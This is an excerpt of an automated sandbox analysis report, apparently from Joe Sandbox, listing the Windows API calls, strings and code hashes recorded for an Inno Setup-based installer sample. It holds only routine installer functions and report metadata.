                                                                                              • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                              • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                              • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                            • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456C50
                                                                                            • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456C7D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                                            • String ID: LoadTypeLib$RegisterTypeLib
                                                                                            • API String ID: 1312246647-2435364021
                                                                                            • Opcode ID: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                                                            • Instruction ID: 3ed1135b8019c5f4588910a0035f5c9e1cabb82a18fedb82429c118dce795412
                                                                                            • Opcode Fuzzy Hash: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                                                            • Instruction Fuzzy Hash: 2911B430B00604AFDB02EFA6CD51A5EB7BDEB89705F5184B6FC44D3752DA389904CA24
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 0045716E
                                                                                            • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045720B
                                                                                            Strings
                                                                                            • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 0045719A
                                                                                            • Failed to create DebugClientWnd, xrefs: 004571D4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                            • API String ID: 3850602802-3720027226
                                                                                            • Opcode ID: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                            • Instruction ID: a6ca84080c04e90ac639e3db27cd2c1e4b46fe4ea5f20cae781d9f83c3d7e460
                                                                                            • Opcode Fuzzy Hash: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                            • Instruction Fuzzy Hash: 1011E770248240AFD710AB69AC85B5FBBD89B54319F15407AFA849B383D7798C18C7AE
                                                                                            APIs
                                                                                              • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                            • GetFocus.USER32 ref: 00478757
                                                                                            • GetKeyState.USER32(0000007A), ref: 00478769
                                                                                            • WaitMessage.USER32(?,00000000,00478790,?,00000000,004787B7,?,?,00000001,00000000,?,?,?,00480402,00000000,004812C8), ref: 00478773
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: FocusMessageStateTextWaitWindow
                                                                                            • String ID: Wnd=$%x
                                                                                            • API String ID: 1381870634-2927251529
                                                                                            • Opcode ID: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                            • Instruction ID: f17a5035e7dee30901ec9a03c3a5a372f1d0714b29ccd98a4f066b2945bd060b
                                                                                            • Opcode Fuzzy Hash: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                            • Instruction Fuzzy Hash: CE11C634A40244AFD704EF65DC49A9EBBF8EB49314F6184BFF409E7681DB386D00CA69
                                                                                            APIs
                                                                                            • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E618
                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E627
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time$File$LocalSystem
                                                                                            • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                            • API String ID: 1748579591-1013271723
                                                                                            • Opcode ID: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                                                            • Instruction ID: 5dd65cae4c1adac9d47cc9ad6336eda1851498fedff4a8a979bd050f9c4a6815
                                                                                            • Opcode Fuzzy Hash: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                                                            • Instruction Fuzzy Hash: A81136A440C3909ED340DF2AC04432BBAE4AB99704F44892EF8C8C6381E779C848DBB7
                                                                                            APIs
                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F83
                                                                                              • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 00453FA8
                                                                                              • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$AttributesDeleteErrorLastMove
                                                                                            • String ID: DeleteFile$MoveFile
                                                                                            • API String ID: 3024442154-139070271
                                                                                            • Opcode ID: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                                                            • Instruction ID: b5871bee3d194af1fa843ac656f6d820fc0ba16d57580c91db5694710367c43f
                                                                                            • Opcode Fuzzy Hash: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                                                            • Instruction Fuzzy Hash: AEF062716142045BD701FBA2D84266EA7ECDB8435EF60443BB900BB6C3DA3C9E094529
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                            • API String ID: 47109696-2631785700
                                                                                            • Opcode ID: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                                                            • Instruction ID: 1950c6f853cc10ed35e504d9d8503a730f6ffd27dc9bba4e9fa27fab35675349
                                                                                            • Opcode Fuzzy Hash: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                                                            • Instruction Fuzzy Hash: 12F0AF31300110DBCB10EB9AD885B6F6299DB9931AF50503BF981DB293E73CCC168629
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C05
                                                                                            • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C28
                                                                                            Strings
                                                                                            • CSDVersion, xrefs: 00483BFC
                                                                                            • System\CurrentControlSet\Control\Windows, xrefs: 00483BD2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpenQueryValue
                                                                                            • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                            • API String ID: 3677997916-1910633163
                                                                                            • Opcode ID: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                            • Instruction ID: 1d850e848a14c5c59b8e95f13e5f63a8fb365af486cc5d6c9f9b701d22fca986
                                                                                            • Opcode Fuzzy Hash: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                            • Instruction Fuzzy Hash: 56F03176E40208A6DF10EAD48C45BAFB3BCAB14B05F104967EA10F7280E678AB048B59
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                            • API String ID: 1646373207-4063490227
                                                                                            • Opcode ID: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                            • Instruction ID: 657275fb9dfacbe144619f02b172540cf2f0c5a6f4252bec6bd03a25d2dd35a2
                                                                                            • Opcode Fuzzy Hash: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                            • Instruction Fuzzy Hash: A5E0DFE0B40B0122D70032BA1C82B6B108D4B84728F90053B3894E62D6DDBCD9840A6D
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAD0), ref: 0042EB62
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB68
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                            • API String ID: 1646373207-260599015
                                                                                            • Opcode ID: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                            • Instruction ID: e1ec077e445c8734ae54db5ffdd633522f5c412f0b7fee52e54de0d29bb4c321
                                                                                            • Opcode Fuzzy Hash: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                            • Instruction Fuzzy Hash: A2D0C793311732665D10B1F73CD1EAB058C891527935404B7F515E5641D55DEC1115AD
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: NotifyWinEvent$user32.dll
                                                                                            • API String ID: 1646373207-597752486
                                                                                            • Opcode ID: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                            • Instruction ID: 5e946f17392c81a4f172a46fe169fb9a1f72c9003761a5edf28bd31acc2f1150
                                                                                            • Opcode Fuzzy Hash: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                            • Instruction Fuzzy Hash: 59E012F0E417049AFF00BBB57B86B1A3A90E764719B00057FF414A6292DB7C481C4F9D
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                            • API String ID: 1646373207-834958232
                                                                                            • Opcode ID: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                            • Instruction ID: 34f838485a85c0df890c3e192e44216071158a5cea444d63bbc0a0b2480586ef
                                                                                            • Opcode Fuzzy Hash: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                            • Instruction Fuzzy Hash: 22B002C0651707589D5032FA0D06B3F48484C5276D728057F3414A51C6DD6C89115D3F
                                                                                            APIs
                                                                                              • Part of subcall function 0044B658: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                            • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                            • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                            • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                            • API String ID: 2238633743-2683653824
                                                                                            • Opcode ID: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                            • Instruction ID: ed4894befccbfeda2ad80f7d1b9e1cb4df1a551eae9986247d0c145e26b1cd95
                                                                                            • Opcode Fuzzy Hash: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                            • Instruction Fuzzy Hash: DDB092D0A82740A4C90077F2985B90F2A4488A271EB10153B710476483EABC84100EAE
                                                                                            APIs
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54), ref: 0047D7CC
                                                                                            • FindClose.KERNEL32(000000FF,0047D7F7,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54,00000000), ref: 0047D7EA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileNext
                                                                                            • String ID:
                                                                                            • API String ID: 2066263336-0
                                                                                            • Opcode ID: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                            • Instruction ID: 2ce97de6e4eb512f8d4c2eb376340b964b0e691095a652a34be041e4083b4e02
                                                                                            • Opcode Fuzzy Hash: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                            • Instruction Fuzzy Hash: 07813A74D0024D9FCF11EFA5CC91ADFBBB8EF49304F5080AAE908A7291D6399A46CF54
                                                                                            APIs
                                                                                              • Part of subcall function 0042EE30: GetTickCount.KERNEL32 ref: 0042EE36
                                                                                              • Part of subcall function 0042EC88: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECBD
                                                                                            • GetLastError.KERNEL32(00000000,00475721,?,?,0049C1E0,00000000), ref: 0047560A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountErrorFileLastMoveTick
                                                                                            • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                                            • API String ID: 2406187244-2685451598
                                                                                            • Opcode ID: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                            • Instruction ID: cfe7f312216358cbd0971b398f0cafde252de4893b1317a5ce8d70824cf78b76
                                                                                            • Opcode Fuzzy Hash: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                            • Instruction Fuzzy Hash: 4D418570A006099BDB10EFA5D882AEF77B5FF48314F508537E408BB395D7789A058BA9
                                                                                            APIs
                                                                                            • GetDesktopWindow.USER32 ref: 00413D46
                                                                                            • GetDesktopWindow.USER32 ref: 00413DFE
                                                                                              • Part of subcall function 00418EC0: 6F59C6F0.COMCTL32(?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EDC
                                                                                              • Part of subcall function 00418EC0: ShowCursor.USER32(00000001,?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EF9
                                                                                            • SetCursor.USER32(00000000,?,?,?,?,00413AF3,00000000,00413B06), ref: 00413E3C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
